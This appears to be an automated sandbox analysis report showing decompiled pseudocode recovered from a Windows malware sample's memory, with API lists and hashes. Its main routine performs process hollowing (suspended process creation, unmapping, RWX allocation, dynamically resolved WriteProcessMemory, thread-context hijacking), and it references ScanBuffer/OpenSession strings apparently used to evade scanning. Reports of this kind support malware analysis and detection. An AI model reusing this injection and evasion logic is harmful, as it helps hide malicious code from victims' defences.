				char _v284;
				void* _t164;
				short* _t181;
				intOrPtr _t186;
				intOrPtr* _t189;
				void* _t225;
				intOrPtr _t255;
				void* _t257;
				intOrPtr _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				void* _t265;
				intOrPtr _t269;
				struct HINSTANCE__* _t303;
				struct HINSTANCE__* _t305;
				intOrPtr _t307;
				PVOID* _t309;
				void* _t310;
				long* _t312;
				intOrPtr _t313;
				PVOID* _t315;
				void* _t316;
				intOrPtr _t318;
				void* _t349;
				void* _t379;
				intOrPtr _t412;
				intOrPtr _t413;
				intOrPtr _t415;
				intOrPtr _t445;
				intOrPtr _t477;
				void* _t479;
				intOrPtr _t481;
				void* _t483;
				intOrPtr _t485;
				intOrPtr _t487;
				void* _t489;
				intOrPtr _t494;
				void* _t495;
				void* _t496;
				intOrPtr _t497;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				intOrPtr _t510;
				intOrPtr _t511;
				intOrPtr _t512;
				intOrPtr _t513;
				intOrPtr _t514;
				intOrPtr _t515;
				intOrPtr _t517;
				intOrPtr _t518;
				void* _t525;
				intOrPtr _t526;
				void* _t535;
				void* _t540;
				void* _t545;
				void* _t550;
				void* _t555;
				void* _t560;
				void* _t567;
				void* _t572;
				void* _t577;
				void* _t582;
				void* _t588;
				void* _t593;
				PVOID* _t594;
				PVOID* _t596;
				void* _t601;
				void* _t606;
				intOrPtr _t608;
				void* _t613;
				void* _t618;
				intOrPtr _t624;
				intOrPtr _t625;
				void* _t634;
				void* _t637;
				void* _t641;

				_t641 = __fp0;
				_t620 = __esi;
				_t624 = _t625;
				_t496 = 0x23;
				goto L2;
				L19:
				_pop(_t526);
				 *[fs:eax] = _t526;
				_push(E02184432);
				return E021748C4( &_v284, 0x46);
				L2:
				_push(0);
				_push(0);
				_t496 = _t496 - 1;
				if(_t496 != 0) {
					goto L2;
				} else {
					_push(__ebx);
					_push(__esi);
					_t494 = __edx;
					_v8 = __eax;
					E02174D54(_v8);
					_push(_t624);
					_push(0x218442b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t625;
					_t164 = E0217304C(0x270e);
					_push(_t164);
					L02183780();
					if(_t164 == 0) {
						E021748F4(0x2194438, 0x2184454);
					} else {
						E021748F4(0x2194438, 0x2184444);
					}
					_push(0x2184460);
					_push( *0x2194438);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v12, E02174D64(_v16));
					_push(_v12);
					_t497 =  *0x2194438; // 0x0
					E02174BB0( &_v24, _t497, 0x2184460);
					E02174A98( &_v20, E02174D64(_v24));
					_pop(_t525);
					E02183690(_v20, _t494, _t525, _t620);
					 *0x2194420 = _t494;
					_t181 =  *0x2194420; // 0x0
					if( *_t181 == 0x5a4d) {
						_push(0);
						_push(_t494);
						_t186 =  *0x2194420; // 0x0
						asm("cdq");
						asm("adc edx, [esp+0x4]");
						 *0x2194424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
						_t189 =  *0x2194424; // 0x0
						if( *_t189 == 0x4550) {
							E02173518(0x2194310, 0x44);
							E02173518(0x2194300, 0x10);
							0x2194310->cb = 0x44;
							_push(0x2184460);
							_push( *0x2194438);
							_push("ScanBuffer");
							E02174C24();
							E02174A98( &_v28, E02174D64(_v32));
							_push(_v28);
							_t502 =  *0x2194438; // 0x0
							E02174BB0( &_v40, _t502, 0x2184460);
							E02174A98( &_v36, E02174D64(_v40));
							_pop(_t535);
							E02183690(_v36, _t494, _t535, 0);
							_push(0x2184460);
							_push( *0x2194438);
							_push("OpenSession");
							E02174C24();
							E02174A98( &_v44, E02174D64(_v48));
							_push(_v44);
							_t503 =  *0x2194438; // 0x0
							E02174BB0( &_v56, _t503, 0x2184460);
							E02174A98( &_v52, E02174D64(_v56));
							_pop(_t540);
							E02183690(_v52, _t494, _t540, 0);
							if(CreateProcessA(E02174D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2194310, 0x2194300) != 0) {
								0x2194354->ContextFlags = 0x10007;
								_t225 =  *0x2194304; // 0x0
								if(GetThreadContext(_t225, 0x2194354) != 0) {
									_push(0x2184460);
									_push( *0x2194438);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v60, E02174D64(_v64));
									_push(_v60);
									_t504 =  *0x2194438; // 0x0
									E02174BB0( &_v72, _t504, 0x2184460);
									E02174A98( &_v68, E02174D64(_v72));
									_pop(_t545);
									E02183690(_v68, _t494, _t545, 0);
									_push(0x2184460);
									_push( *0x2194438);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v76, E02174D64(_v80));
									_push(_v76);
									_t505 =  *0x2194438; // 0x0
									E02174BB0( &_v88, _t505, 0x2184460);
									E02174A98( &_v84, E02174D64(_v88));
									_pop(_t550);
									E02183690(_v84, _t494, _t550, 0);
									_t255 =  *0x21943f8; // 0x0
									_t257 = 0x2194300->hProcess; // 0x0
									ReadProcessMemory(_t257, _t255 + 8, 0x2194428, 4, 0x2194430);
									_t259 =  *0x2194424; // 0x0
									_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2194428; // 0x0
									if(_t634 != 0) {
										_t261 =  *0x2194424; // 0x0
										_t263 =  *0x2194424; // 0x0
										_t265 = 0x2194300->hProcess; // 0x0
										 *0x219442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
									} else {
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v92, E02174D64(_v96));
										_push(_v92);
										_t517 =  *0x2194438; // 0x0
										E02174BB0( &_v104, _t517, 0x2184460);
										E02174A98( &_v100, E02174D64(_v104));
										_pop(_t613);
										E02183690(_v100, _t494, _t613, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v108, E02174D64(_v112));
										_push(_v108);
										_t518 =  *0x2194438; // 0x0
										E02174BB0( &_v120, _t518, 0x2184460);
										E02174A98( &_v116, E02174D64(_v120));
										_pop(_t618);
										E02183690(_v116, _t494, _t618, 0);
										_t477 =  *0x2194424; // 0x0
										_t479 = 0x2194300->hProcess; // 0x0
										if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
											_t481 =  *0x2194424; // 0x0
											_t483 = 0x2194300->hProcess; // 0x0
											 *0x219442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
										} else {
											_t485 =  *0x2194424; // 0x0
											_t487 =  *0x2194424; // 0x0
											_t489 = 0x2194300->hProcess; // 0x0
											 *0x219442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
										}
									}
									if( *0x219442c != 0) {
										_t495 = E021838A0(_t494, _t641);
										_t269 =  *0x2194424; // 0x0
										_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x219442c; // 0x0
										if(_t637 != 0) {
											_push(0x2184460);
											_push( *0x2194438);
											_push("ScanBuffer");
											E02174C24();
											E02174A98( &_v124, E02174D64(_v128));
											_push(_v124);
											_t512 =  *0x2194438; // 0x0
											E02174BB0( &_v136, _t512, 0x2184460);
											E02174A98( &_v132, E02174D64(_v136));
											_pop(_t588);
											E02183690(_v132, _t495, _t588, 0);
											_push(0x2184460);
											_push( *0x2194438);
											_push("OpenSession");
											E02174C24();
											E02174A98( &_v140, E02174D64(_v144));
											_push(_v140);
											_t513 =  *0x2194438; // 0x0
											E02174BB0( &_v152, _t513, 0x2184460);
											E02174A98( &_v148, E02174D64(_v152));
											_pop(_t593);
											E02183690(_v148, _t495, _t593, 0);
											_t412 =  *0x2194424; // 0x0
											_t594 =  *0x219442c; // 0x0
											_t413 =  *0x2194424; // 0x0
											E02183798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
											_t415 =  *0x2194424; // 0x0
											_t596 =  *0x219442c; // 0x0
											 *(_t415 + 0x34) = _t596;
											_push(0x2184460);
											_push( *0x2194438);
											_push("ScanBuffer");
											E02174C24();
											E02174A98( &_v156, E02174D64(_v160));
											_push(_v156);
											_t514 =  *0x2194438; // 0x0
											E02174BB0( &_v168, _t514, 0x2184460);
											E02174A98( &_v164, E02174D64(_v168));
											_pop(_t601);
											E02183690(_v164, _t495, _t601, 0);
											_push(0x2184460);
											_push( *0x2194438);
											_push("OpenSession");
											E02174C24();
											E02174A98( &_v172, E02174D64(_v176));
											_push(_v172);
											_t515 =  *0x2194438; // 0x0
											E02174BB0( &_v184, _t515, 0x2184460);
											E02174A98( &_v180, E02174D64(_v184));
											_pop(_t606);
											E02183690(_v180, _t495, _t606, 0);
											_push(0);
											_push(_t495);
											_t445 =  *0x2194420; // 0x0
											asm("cdq");
											asm("adc edx, [esp+0x4]");
											_t608 =  *0x2194424; // 0x0
											E02176A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
										}
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v188, E02174D64(_v192));
										_push(_v188);
										_t506 =  *0x2194438; // 0x0
										E02174BB0( &_v200, _t506, 0x2184460);
										E02174A98( &_v196, E02174D64(_v200));
										_pop(_t555);
										E02183690(_v196, _t495, _t555, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v204, E02174D64(_v208));
										_push(_v204);
										_t507 =  *0x2194438; // 0x0
										E02174BB0( &_v216, _t507, 0x2184460);
										E02174A98( &_v212, E02174D64(_v216));
										_pop(_t560);
										E02183690(_v212, _t495, _t560, 0);
										E02174A98( &_v220, "KernelBase");
										 *0x2194468 = E0217CAC8(_v220, _t495, 0x8000);
										_t303 =  *0x2194468; // 0x0
										 *0x219446c = GetProcAddress(_t303, "WriteProcessMemory");
										_t305 =  *0x2194468; // 0x0
										FreeLibrary(_t305);
										_t307 =  *0x2194424; // 0x0
										_t309 =  *0x219442c; // 0x0
										_t310 = 0x2194300->hProcess; // 0x0
										 *0x219446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2194430);
										_t312 =  *0x2194430; // 0x0
										_t313 =  *0x2194424; // 0x0
										_t315 =  *0x219442c; // 0x0
										_t316 = 0x2194300->hProcess; // 0x0
										NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
										_t318 =  *0x2194424; // 0x0
										 *0x2194404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x219442c;
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v224, E02174D64(_v228));
										_push(_v224);
										_t508 =  *0x2194438; // 0x0
										E02174BB0( &_v236, _t508, 0x2184460);
										E02174A98( &_v232, E02174D64(_v236));
										_pop(_t567);
										E02183690(_v232, _t495, _t567, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v240, E02174D64(_v244));
										_push(_v240);
										_t509 =  *0x2194438; // 0x0
										E02174BB0( &_v252, _t509, 0x2184460);
										E02174A98( &_v248, E02174D64(_v252));
										_pop(_t572);
										E02183690(_v248, _t495, _t572, 0);
										_t349 =  *0x2194304; // 0x0
										SetThreadContext(_t349, 0x2194354);
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v256, E02174D64(_v260));
										_push(_v256);
										_t510 =  *0x2194438; // 0x0
										E02174BB0( &_v268, _t510, 0x2184460);
										E02174A98( &_v264, E02174D64(_v268));
										_pop(_t577);
										E02183690(_v264, _t495, _t577, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v272, E02174D64(_v276));
										_push(_v272);
										_t511 =  *0x2194438; // 0x0
										E02174BB0( &_v284, _t511, 0x2184460);
										E02174A98( &_v280, E02174D64(_v284));
										_pop(_t582);
										E02183690(_v280, _t495, _t582, 0);
										_t379 =  *0x2194304; // 0x0
										NtResumeThread(_t379);
										E02172C5C(_t495);
									}
								}
							}
						}
					}
					goto L19;
				}
			}


























































































































































                                                                                                0x0218398e
                                                                                                0x0218398e
                                                                                                0x02183991
                                                                                                0x02183993
                                                                                                0x02183993
                                                                                                0x0218440d
                                                                                                0x0218440f
                                                                                                0x02184412
                                                                                                0x02184415
                                                                                                0x0218442a
                                                                                                0x02183998
                                                                                                0x02183998
                                                                                                0x0218399a
                                                                                                0x0218399c
                                                                                                0x0218399d
                                                                                                0x00000000
                                                                                                0x0218399f
                                                                                                0x0218399f
                                                                                                0x021839a0
                                                                                                0x021839a1
                                                                                                0x021839a3
                                                                                                0x021839a9
                                                                                                0x021839b0
                                                                                                0x021839b1
                                                                                                0x021839b6
                                                                                                0x021839b9
                                                                                                0x021839c1
                                                                                                0x021839c6
                                                                                                0x021839c7
                                                                                                0x021839ce
                                                                                                0x021839eb
                                                                                                0x021839d0
                                                                                                0x021839da
                                                                                                0x021839da
                                                                                                0x021839f0
                                                                                                0x021839f5
                                                                                                0x021839fb
                                                                                                0x02183a08
                                                                                                0x02183a1a
                                                                                                0x02183a22
                                                                                                0x02183a26
                                                                                                0x02183a31
                                                                                                0x02183a43
                                                                                                0x02183a4b
                                                                                                0x02183a4c
                                                                                                0x02183a53
                                                                                                0x02183a59
                                                                                                0x02183a63
                                                                                                0x02183a6d
                                                                                                0x02183a6e
                                                                                                0x02183a6f
                                                                                                0x02183a77
                                                                                                0x02183a7b
                                                                                                0x02183a82
                                                                                                0x02183a87
                                                                                                0x02183a92
                                                                                                0x02183aa4
                                                                                                0x02183ab5
                                                                                                0x02183aba
                                                                                                0x02183ac4
                                                                                                0x02183ac9
                                                                                                0x02183acf
                                                                                                0x02183adc
                                                                                                0x02183aee
                                                                                                0x02183af6
                                                                                                0x02183afa
                                                                                                0x02183b05
                                                                                                0x02183b17
                                                                                                0x02183b1f
                                                                                                0x02183b20
                                                                                                0x02183b25
                                                                                                0x02183b2a
                                                                                                0x02183b30
                                                                                                0x02183b3d
                                                                                                0x02183b4f
                                                                                                0x02183b57
                                                                                                0x02183b5b
                                                                                                0x02183b66
                                                                                                0x02183b78
                                                                                                0x02183b80
                                                                                                0x02183b81
                                                                                                0x02183bae
                                                                                                0x02183bb4
                                                                                                0x02183bc3
                                                                                                0x02183bd0
                                                                                                0x02183bd6
                                                                                                0x02183bdb
                                                                                                0x02183be1
                                                                                                0x02183bee
                                                                                                0x02183c00
                                                                                                0x02183c08
                                                                                                0x02183c0c
                                                                                                0x02183c17
                                                                                                0x02183c29
                                                                                                0x02183c31
                                                                                                0x02183c32
                                                                                                0x02183c37
                                                                                                0x02183c3c
                                                                                                0x02183c42
                                                                                                0x02183c4f
                                                                                                0x02183c61
                                                                                                0x02183c69
                                                                                                0x02183c6d
                                                                                                0x02183c78
                                                                                                0x02183c8a
                                                                                                0x02183c92
                                                                                                0x02183c93
                                                                                                0x02183ca4
                                                                                                0x02183cad
                                                                                                0x02183cb3
                                                                                                0x02183cb8
                                                                                                0x02183cc0
                                                                                                0x02183cc6
                                                                                                0x02183dfc
                                                                                                0x02183e05
                                                                                                0x02183e0e
                                                                                                0x02183e19
                                                                                                0x02183ccc
                                                                                                0x02183ccc
                                                                                                0x02183cd1
                                                                                                0x02183cd7
                                                                                                0x02183ce4
                                                                                                0x02183cf6
                                                                                                0x02183cfe
                                                                                                0x02183d02
                                                                                                0x02183d0d
                                                                                                0x02183d1f
                                                                                                0x02183d27
                                                                                                0x02183d28
                                                                                                0x02183d2d
                                                                                                0x02183d32
                                                                                                0x02183d38
                                                                                                0x02183d45
                                                                                                0x02183d57
                                                                                                0x02183d5f
                                                                                                0x02183d63
                                                                                                0x02183d6e
                                                                                                0x02183d80
                                                                                                0x02183d88
                                                                                                0x02183d89
                                                                                                0x02183d8e
                                                                                                0x02183d97
                                                                                                0x02183da4
                                                                                                0x02183dd8
                                                                                                0x02183de3
                                                                                                0x02183dee
                                                                                                0x02183da6
                                                                                                0x02183dad
                                                                                                0x02183db6
                                                                                                0x02183dbf
                                                                                                0x02183dca
                                                                                                0x02183dca
                                                                                                0x02183da4
                                                                                                0x02183e25
                                                                                                0x02183e32
                                                                                                0x02183e34
                                                                                                0x02183e3c
                                                                                                0x02183e42
                                                                                                0x02183e48
                                                                                                0x02183e4d
                                                                                                0x02183e53
                                                                                                0x02183e60
                                                                                                0x02183e72
                                                                                                0x02183e7a
                                                                                                0x02183e81
                                                                                                0x02183e8c
                                                                                                0x02183ea1
                                                                                                0x02183ea9
                                                                                                0x02183eaa
                                                                                                0x02183eaf
                                                                                                0x02183eb4
                                                                                                0x02183eba
                                                                                                0x02183eca
                                                                                                0x02183ee2
                                                                                                0x02183eed
                                                                                                0x02183ef4
                                                                                                0x02183eff
                                                                                                0x02183f17
                                                                                                0x02183f22
                                                                                                0x02183f23
                                                                                                0x02183f28
                                                                                                0x02183f2d
                                                                                                0x02183f37
                                                                                                0x02183f3e
                                                                                                0x02183f43
                                                                                                0x02183f48
                                                                                                0x02183f4e
                                                                                                0x02183f51
                                                                                                0x02183f56
                                                                                                0x02183f5c
                                                                                                0x02183f6c
                                                                                                0x02183f84
                                                                                                0x02183f8f
                                                                                                0x02183f96
                                                                                                0x02183fa1
                                                                                                0x02183fb9
                                                                                                0x02183fc4
                                                                                                0x02183fc5
                                                                                                0x02183fca
                                                                                                0x02183fcf
                                                                                                0x02183fd5
                                                                                                0x02183fe5
                                                                                                0x02183ffd
                                                                                                0x02184008
                                                                                                0x0218400f
                                                                                                0x0218401a
                                                                                                0x02184032
                                                                                                0x0218403d
                                                                                                0x0218403e
                                                                                                0x02184047
                                                                                                0x02184048
                                                                                                0x02184049
                                                                                                0x02184051
                                                                                                0x02184055
                                                                                                0x02184061
                                                                                                0x02184067
                                                                                                0x02184067
                                                                                                0x0218406c
                                                                                                0x02184071
                                                                                                0x02184077
                                                                                                0x02184087
                                                                                                0x0218409f
                                                                                                0x021840aa
                                                                                                0x021840b1
                                                                                                0x021840bc
                                                                                                0x021840d4
                                                                                                0x021840df
                                                                                                0x021840e0
                                                                                                0x021840e5
                                                                                                0x021840ea
                                                                                                0x021840f0
                                                                                                0x02184100
                                                                                                0x02184118
                                                                                                0x02184123
                                                                                                0x0218412a
                                                                                                0x02184135
                                                                                                0x0218414d
                                                                                                0x02184158
                                                                                                0x02184159
                                                                                                0x02184169
                                                                                                0x0218417e
                                                                                                0x02184188
                                                                                                0x02184193
                                                                                                0x02184198
                                                                                                0x0218419e
                                                                                                0x021841a8
                                                                                                0x021841b2
                                                                                                0x021841b8
                                                                                                0x021841be
                                                                                                0x021841c4
                                                                                                0x021841cc
                                                                                                0x021841d5
                                                                                                0x021841db
                                                                                                0x021841e1
                                                                                                0x021841e6
                                                                                                0x021841f4
                                                                                                0x021841f9
                                                                                                0x021841fe
                                                                                                0x02184204
                                                                                                0x02184214
                                                                                                0x0218422c
                                                                                                0x02184237
                                                                                                0x0218423e
                                                                                                0x02184249
                                                                                                0x02184261
                                                                                                0x0218426c
                                                                                                0x0218426d
                                                                                                0x02184272
                                                                                                0x02184277
                                                                                                0x0218427d
                                                                                                0x0218428d
                                                                                                0x021842a5
                                                                                                0x021842b0
                                                                                                0x021842b7
                                                                                                0x021842c2
                                                                                                0x021842da
                                                                                                0x021842e5
                                                                                                0x021842e6
                                                                                                0x021842f0
                                                                                                0x021842f6
                                                                                                0x021842fb
                                                                                                0x02184300
                                                                                                0x02184306
                                                                                                0x02184316
                                                                                                0x0218432e
                                                                                                0x02184339
                                                                                                0x02184340
                                                                                                0x0218434b
                                                                                                0x02184363
                                                                                                0x0218436e
                                                                                                0x0218436f
                                                                                                0x02184374
                                                                                                0x02184379
                                                                                                0x0218437f
                                                                                                0x0218438f
                                                                                                0x021843a7
                                                                                                0x021843b2
                                                                                                0x021843b9
                                                                                                0x021843c4
                                                                                                0x021843dc
                                                                                                0x021843e7
                                                                                                0x021843e8
                                                                                                0x021843ed
                                                                                                0x021843f3
                                                                                                0x02184402
                                                                                                0x02184407
                                                                                                0x02183e25
                                                                                                0x02183bd0
                                                                                                0x02183bae
                                                                                                0x02183a92
                                                                                                0x00000000
                                                                                                0x02183a63

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218442B,?,?,?,00000000,00000000), ref: 021839C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
                                                                                                • API String ID: 3180263700-3519499064
                                                                                                • Opcode ID: 910b69e5aee5ebdd78829a08240ce8794875c19dd522cddde2742c75d54f63de
                                                                                                • Instruction ID: 97eedd5c610bb314a9352192945d45e6c57cb810e047b11b402a7aaa954ebb3b
                                                                                                • Opcode Fuzzy Hash: 910b69e5aee5ebdd78829a08240ce8794875c19dd522cddde2742c75d54f63de
                                                                                                • Instruction Fuzzy Hash: C0420F75AC0209DFEB21FB64E980FDE73FAAB85700F5184A5A505A7200DF70AE86CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02175B48 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E02175B48(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E02175B28( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E02175B28(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E02175B28( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}















                                                                                                0x02175b54
                                                                                                0x02175b57
                                                                                                0x02175b5d
                                                                                                0x02175b6a
                                                                                                0x02175b71
                                                                                                0x02175bb6
                                                                                                0x02175bbc
                                                                                                0x02175bf9
                                                                                                0x00000000
                                                                                                0x02175bbe
                                                                                                0x02175bc5
                                                                                                0x02175bd6
                                                                                                0x02175bdb
                                                                                                0x02175be1
                                                                                                0x02175be9
                                                                                                0x02175bee
                                                                                                0x02175bfc
                                                                                                0x02175bfe
                                                                                                0x02175c10
                                                                                                0x02175cc1
                                                                                                0x02175c22
                                                                                                0x02175c30
                                                                                                0x02175c46
                                                                                                0x02175c5e
                                                                                                0x02175c65
                                                                                                0x02175c6b
                                                                                                0x02175c87
                                                                                                0x02175c89
                                                                                                0x02175cab
                                                                                                0x02175cbd
                                                                                                0x02175cbf
                                                                                                0x00000000
                                                                                                0x02175cbf
                                                                                                0x02175c87
                                                                                                0x02175c65
                                                                                                0x00000000
                                                                                                0x02175c30
                                                                                                0x02175cd9
                                                                                                0x02175cd9
                                                                                                0x02175bee
                                                                                                0x02175bdb
                                                                                                0x02175bc5
                                                                                                0x02175b73
                                                                                                0x02175b81
                                                                                                0x02175b85
                                                                                                0x00000000
                                                                                                0x02175b87
                                                                                                0x02175b87
                                                                                                0x02175b92
                                                                                                0x02175b96
                                                                                                0x02175b9b
                                                                                                0x00000000
                                                                                                0x02175b9d
                                                                                                0x02175bac
                                                                                                0x02175bac
                                                                                                0x02175b9b
                                                                                                0x02175b85
                                                                                                0x02175cde
                                                                                                0x02175ce7

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,02176ED0,02170000,021907B4), ref: 02175B65
                                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02175B7C
                                                                                                • lstrcpynA.KERNEL32(?,?,?), ref: 02175BAC
                                                                                                • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C10
                                                                                                • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C46
                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C59
                                                                                                • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C6B
                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000,021907B4), ref: 02175C77
                                                                                                • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0,02170000), ref: 02175CAB
                                                                                                • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02176ED0), ref: 02175CB7
                                                                                                • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02175CD9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                • API String ID: 3245196872-1565342463
                                                                                                • Opcode ID: b79d9f7d4cd7dc8ec1285aa365259b8e879f6b419a8673a1863e6a0522ef51ca
                                                                                                • Instruction ID: 6358e87a6c7b163e6f97be597ec38de9c9273947e908e07557965429cca35145
                                                                                                • Opcode Fuzzy Hash: b79d9f7d4cd7dc8ec1285aa365259b8e879f6b419a8673a1863e6a0522ef51ca
                                                                                                • Instruction Fuzzy Hash: BB413171D8065CBFDB20DEE8CC88BEEB7BEAB88340F5445A5A949D7241D7709E848F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02175E18 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02175E18() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
